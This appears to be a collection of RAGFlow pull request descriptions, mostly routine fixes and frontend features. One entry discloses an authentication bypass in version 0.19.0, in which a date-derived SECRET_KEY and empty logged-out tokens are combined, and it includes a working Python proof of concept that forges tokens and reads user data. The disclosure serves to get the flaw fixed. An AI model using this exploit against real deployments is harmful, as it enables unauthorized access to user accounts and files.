- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases
Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset
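The None check described above can be sketched as follows. The helper name `normalize_rerank_model` is hypothetical and is not taken from the SDK.

```python
def normalize_rerank_model(value):
    """Map an unset rerank model (None) to the empty-string default.

    A column declared with null=False rejects None but accepts "".
    """
    return "" if value is None else value


print(repr(normalize_rerank_model(None)))
print(repr(normalize_rerank_model("my-reranker")))
```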
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop keeps
fetching them. A single task executor then ends up holding many
tasks in the pending state, and we have to wait for those pending tasks
to be returned to the queue.
If `MAX_CONCURRENT_TASKS` is set to X, then only X tasks should be
picked from the queue in the first place; the others should be left in the
queue for other `task_executors`, or be picked up once one of the slots in
the current executor becomes free. This PR ensures this behavior.
The additional changes come from the Ruff linting in pre-commit, but I
believe they are expected in order to keep the coding style.
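The intended behavior can be illustrated with a small sketch. It uses `asyncio` and an in-memory queue rather than the project's actual trio and Redis code, and `run_executor`, `handle` and `demo` are hypothetical names. The key point is that a slot is acquired before a task is taken from the queue.

```python
import asyncio

MAX_CONCURRENT_TASKS = 2  # assumed value for this demo


async def run_executor(queue, handle, limit=MAX_CONCURRENT_TASKS):
    """Take a task from the queue only after a slot is free."""
    slots = asyncio.Semaphore(limit)
    running = set()

    async def worker(task):
        try:
            await handle(task)
        finally:
            slots.release()  # free the slot so the next task can be fetched

    while True:
        await slots.acquire()  # wait for a free slot BEFORE touching the queue
        try:
            task = queue.get_nowait()
        except asyncio.QueueEmpty:
            slots.release()
            break
        job = asyncio.create_task(worker(task))
        running.add(job)
        job.add_done_callback(running.discard)
    await asyncio.gather(*running)


async def demo():
    queue = asyncio.Queue()
    for i in range(5):
        queue.put_nowait(i)
    active = 0
    peak = 0

    async def handle(task):
        nonlocal active, peak
        active += 1
        peak = max(peak, active)
        await asyncio.sleep(0.01)
        active -= 1

    await run_executor(queue, handle)
    return peak, queue.qsize()


peak, left = asyncio.run(demo())
print(f"peak concurrency: {peak}, tasks left in queue: {left}")
```

Tasks that have not been fetched stay in the queue, so another executor could still take them.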
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
An exception is thrown only when the JSON content has exactly two keys, `code`
and `message`. In other cases, response.content is returned normally.
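A minimal sketch of that rule, assuming the response body is available as bytes. `ApiError` and `unwrap_download` are hypothetical names, not the SDK's own.

```python
import json


class ApiError(Exception):
    """Raised when the body is an error envelope rather than file content."""


def unwrap_download(content: bytes) -> bytes:
    """Return content unless it is JSON with exactly the keys code and message."""
    try:
        payload = json.loads(content)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return content  # not JSON at all, so it is ordinary file content
    if isinstance(payload, dict) and set(payload) == {"code", "message"}:
        raise ApiError(payload["message"])
    return content  # a legitimate JSON file that merely contains those keys
```

A JSON document with additional keys, such as `{"code": 0, "message": "ok", "data": 1}`, is passed through unchanged.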
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The streaming logic currently does not match the non-streaming logic, which can
leave downstream components unable to find their upstream components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
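The two flaws in this flow suggest two defensive checks, sketched below. This is an illustration under stated assumptions and not the fix that was merged: `make_secret_key`, `is_usable_access_token`, `find_user` and the in-memory `users` list are all hypothetical.

```python
import secrets


def make_secret_key() -> str:
    """Generate an unpredictable key instead of deriving one from the date."""
    return secrets.token_hex(32)


def is_usable_access_token(token) -> bool:
    """Reject missing, empty, or whitespace-only tokens before any lookup."""
    return isinstance(token, str) and bool(token.strip())


def find_user(users, token):
    """Look up a user by access token, never matching logged-out accounts."""
    if not is_usable_access_token(token):
        return None
    for user in users:
        if user["access_token"] and user["access_token"] == token:
            return user
    return None


users = [
    {"id": 1, "access_token": ""},     # logged out
    {"id": 2, "access_token": "abc"},  # active session
]
print(find_user(users, ""))
print(find_user(users, "abc"))
```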
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    auth_headers = {"Authorization": malicious_token}
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
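A test helper could read the variable along these lines. The function name `require_api_key` is hypothetical; only the variable name `ZHIPU_AI_API_KEY` comes from this PR.

```python
import os


def require_api_key(name="ZHIPU_AI_API_KEY", environ=None):
    """Return the API key from the environment, failing loudly if it is unset."""
    environ = os.environ if environ is None else environ
    key = environ.get(name, "").strip()
    if not key:
        raise RuntimeError(f"{name} is not set; run: export {name}=your_api_key_here")
    return key
```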
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
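A rough way to find and fix such lines is sketched below. It assumes that any line containing a CJK ideograph is genuine Chinese text and should be left alone; the helper name and that heuristic are illustrative, not what this PR used.

```python
import re

FULLWIDTH_COMMA = "\uff0c"
CJK_IDEOGRAPH = re.compile(r"[\u4e00-\u9fff]")


def fix_fullwidth_commas(line: str) -> str:
    """Replace U+FF0C with ', ' on lines that contain no CJK ideographs."""
    if CJK_IDEOGRAPH.search(line):
        return line  # real Chinese text: leave untouched
    return re.sub(FULLWIDTH_COMMA + r" *", ", ", line)


print(fix_fullwidth_commas("Hello\uff0cworld"))
```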
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category component itself should work, but its downstream components
seem unable to get the upstream output.
This PR adds the category's output as an attribute.
However, `base.py` contains this logic:
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
When this branch is taken, no attempt is made to get the output from the
category component (I do not have full context on why this condition exists).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Sync the test group from sdk/python/pyproject.toml to the top-level pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unnecessary truncation in the markdown parser, so that markdown works
as described in
[this comment](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
on #7824, supporting multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**
### What problem does this PR solve?
When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.
This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---
**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).
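The changes listed above can be sketched roughly as follows. The function names and the one-second default delay are assumptions made for illustration; `WERKZEUG_RUN_MAIN` is the variable Werkzeug sets to `"true"` in the reloader child process.

```python
import os
import threading


def should_start_background_threads(debug: bool, environ=os.environ) -> bool:
    """In debug mode, start threads only in the reloader child process."""
    if not debug:
        return True  # production: keep the original behavior
    return environ.get("WERKZEUG_RUN_MAIN") == "true"


def start_update_progress(target, delay=1.0, debug=False, environ=os.environ):
    """Launch target after a delay on a daemon timer thread, or skip it."""
    if not should_start_background_threads(debug, environ):
        return None
    timer = threading.Timer(delay, target)
    timer.daemon = True  # never block process exit or a reload
    timer.start()
    return timer
```

In the reloader parent process the call returns `None`, so no thread exists that could keep the old process alive during a restart.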
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
If the name field is not specified, Docker Compose will default to using
`docker` as the project name. This may cause conflicts with other
default projects, leading to unintended operations when executing
`docker compose` commands.
### What problem does this PR solve?
When executing Docker Compose commands, interference occurs between
multiple default projects, leading to operational chaos.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Install why-did-you-render to detect component updates #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7753
The underlying cause is that a change in the selected row keys triggers a
test run, but I do not know why.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add InnerBlurInput component to avoid frequent updates of zustand
causing the input box to lose focus #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code component debug issue. #7908.
I removed the additions from #7933; `output` has no semantic meaning
for `parameters`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add advanced delimiter detection for naive merge. #7824
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
It would fail if PARALLEL_DEVICES = None in the OCR class, because it
passes 0 to the TextDetector and TextRecognizer init methods.
It would be simpler to set 0 as the default value for
PARALLEL_DEVICES.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7908
Given the code
` _, out = cpn.output(allow_partial=False)`
` def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame,
partial]]:
o = getattr(self._param, self._param.output_var_name)`
this method needs to be called,
but I do not have the full context.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use memo to wrap canvas nodes to improve fluency #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Truncate long agent descriptions to prevent overflow outside the agent
card container
### What problem does this PR solve?
Currently, long description text overflows the agent card; it
should be truncated so that it displays properly.
<img width="275" alt="Screenshot 2025-05-28 220329"
src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f"
/>
<img width="275" alt="Screenshot 2025-05-28 220353"
src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646"
/>
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Use useWatch to synchronize the form data to canvas zustand #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the citation mark to [ID:n], which is easier for LLMs to follow
as an instruction :) #7904
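For illustration, citations in this format can be pulled out of a model answer with a short regular expression. The pattern and the helper name `cited_ids` are assumptions, not the project's actual parser.

```python
import re

# Matches markers such as [ID:0] or [ID: 12]
CITATION = re.compile(r"\[ID:\s*(\d+)\]")


def cited_ids(answer: str) -> list:
    """Return the chunk indices cited in an answer, in order of appearance."""
    return [int(n) for n in CITATION.findall(answer)]


print(cited_ids("Paris is the capital [ID:0] and largest city [ID:12]."))
```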
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Display bug in the early stage of conversation chat #7904
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix early return when updating a document. #7886
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…sing the SDK chat API
### What problem does this PR solve?
When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.
Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.
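A client-side sketch of such a request body. Only the `kb_ids` field comes from this PR; the `question` field and the helper name `build_chat_request` are assumptions made for illustration.

```python
import json


def build_chat_request(question, kb_ids=None):
    """Build a JSON body, adding kb_ids only when the user selected some."""
    payload = {"question": question}  # "question" is an assumed field name
    if kb_ids:
        payload["kb_ids"] = list(kb_ids)  # extra knowledge bases for this request
    return json.dumps(payload)


print(build_chat_request("What is the refund policy?", ["kb_1", "kb_2"]))
```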
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Li Ye <liye@unittec.com>
Change conversation to sessions
### What problem does this PR solve?
The related_question interface has the wrong URI in the HTTP API doc
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Close #7879
I checked the current master code: the kb_parser_config is joined from the
knowledge table, so I think there are some edge cases caused by historical
data
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
**Issue Description:**
When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.
However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:
```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```
**Proposed Solution:**
Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add DeepWiki Badge Maker
### Type of change
- [x] Other (please describe): add DeepWiki Badge Maker
---------
Co-authored-by: lixiaodong11 <lixiaodong11@hikvision.com.cn>
### What problem does this PR solve?
Feat: Add the SelectWithSearch component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Put buildSelectOptions to common-util.ts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
There are two main changes:
1. Update xgboost to 1.6.0 so that the project builds on macOS with Apple
chips; see the issue:
https://github.com/infiniflow/ragflow/issues/5114.
2. When `use_china_mirrors` is set in `download_deps.py`, the names of
chrome files downloaded by the script will be different from the file
names used in Dockerfile, so I added the file name in `get_urls`
function to solve this problem.
I think it's better to add testing for Docker image
`infiniflow/ragflow_deps` to the test workflow, but since the workflow
is currently running on a self-hosted runner, I'm not sure how to modify
it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add the WaitingDialogue operator. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR solves the problems mentioned in the
PR (https://github.com/infiniflow/ragflow/pull/7140), which I also
submitted.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Introduction
I fixed the problems that occur when using OpenSearch as the DOC_ENGINE: the
pytest failures and the incorrect API return values.
They mainly concern delete chunk, list chunks, update chunk, and retrieval chunk.
The pytest command `cd sdk/python && uv sync --python 3.10 --group test
--frozen && source .venv/bin/activate && cd test/test_http_api &&
DOC_ENGINE=opensearch pytest test_chunk_management_within_dataset -s
--tb=short` now succeeds.
### Others
Because Elasticsearch and OpenSearch behave differently in places, some pytest
results for OpenSearch are correct and reasonable. However, some pytest
params (skipif params) are incompatible, so I changed some of the skipif
params.
As a search engine programmer, I will keep focusing on the usage of vector
databases (especially OpenSearch) for RAG.
Thanks for your review.
### What problem does this PR solve?
Feat: Convert the data of the message operator to a string array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Upgrade react-hook-form to the latest version to solve the problem
that appending a useFieldArray entry cannot trigger the watch callback
function #3221
[issue: watch is not called when appending first item to Field Array
#12370](https://github.com/react-hook-form/react-hook-form/issues/12370)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Close #7830
The caller method should already have code to handle this.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Delete Corresponding Minio Bucket When Deleting a Knowledge Base
[issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the script text of the code operator is not
displayed after refreshing the page after saving the script text of the
code operator #4977
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Refactor the MessageForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add more robust fallbacks for citations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change default models to built-in models
https://github.com/infiniflow/ragflow/issues/7774
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Add sandbox options for max memory and timeout.
2. Malicious code detection for Python only.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add code_executor_manager. #4977.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Reconstruct the QueryTable of BeginForm using shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize BeginForm's query data to the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: xiaohzho <xiaohzho@cisco.com>
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Verify the parameters of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Refactor BeginForm with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This small PR resolves the regex library warnings showing in Python3.11:
```python
DeprecationWarning: 'count' is passed as positional argument
```
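The usual remedy for this warning is to pass `count` by keyword. The sketch below uses the standard library `re` module, whose `sub` accepts `count` as a keyword argument; the helper name `replace_first` is hypothetical.

```python
import re


def replace_first(pattern: str, repl: str, text: str) -> str:
    """Replace only the first match, passing count by keyword."""
    # Positional form that triggers the warning: re.sub(pattern, repl, text, 1)
    return re.sub(pattern, repl, text, count=1)


print(replace_first(r"a", "b", "aaa"))
```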
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: Emmanuel Ferdman <emmanuelferdman@gmail.com>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7761
It may be difficult to achieve zero delay, since that requires passing the
cancel token to every part.
Another solution is to show a zero-delay effect in the UI only,
and let the task stop later.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add return value widget to CodeForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Switching the programming language of the code operator will
switch the corresponding language template #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the page would refresh continuously when
opening the sheet on the right side of the canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Delete useless image blobs when the task executor hits edge cases
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the agent list page by page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Migrate the code operator to the new agent. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The image displayed in the reply message can also be clicked to
display the location of the source document where the slice is located
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:
- Pydantic Validation
- Error Handling
- Test Updates
- Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy
This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.
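The three steps above can be sketched with a plain dictionary standing in for the web session. The function names and the `oauth_state` session key are hypothetical.

```python
import hmac
import secrets


def begin_login(session: dict) -> str:
    """Generate a unique state value and remember it in the session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state  # would be appended to the authorization URL


def verify_callback(session: dict, returned_state) -> bool:
    """Check the state echoed back by the provider; each state is single-use."""
    expected = session.pop("oauth_state", None)
    if not expected or not returned_state:
        return False
    # Constant-time comparison on bytes avoids leaking match position
    return hmac.compare_digest(expected.encode(), str(returned_state).encode())
```

Popping the stored value means a replayed callback with the same `state` is rejected.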
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: When you create a new API module named xxxa_api, the access route
becomes xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route becomes 'dat' instead of
'data'.
Fix: Fixed the issue where a new knowledge base would not be renamed
when a knowledge base with the same name already existed.
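The route symptom in the first fix is consistent with `str.rstrip` being used to drop the `_api` suffix, since `rstrip` treats its argument as a set of characters rather than a suffix. That cause is an assumption; the sketch below only reproduces the symptom and shows one suffix-safe alternative (`str.removesuffix`, Python 3.9+).

```python
def route_with_rstrip(module_name: str) -> str:
    """Strips any trailing '_', 'a', 'p', 'i' characters, not the suffix."""
    return module_name.rstrip("_api")


def route_with_removesuffix(module_name: str) -> str:
    """Removes the literal '_api' suffix only (Python 3.9+)."""
    return module_name.removesuffix("_api")


print(route_with_rstrip("data_api"))        # dat
print(route_with_removesuffix("data_api"))  # data
```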
### Type of change
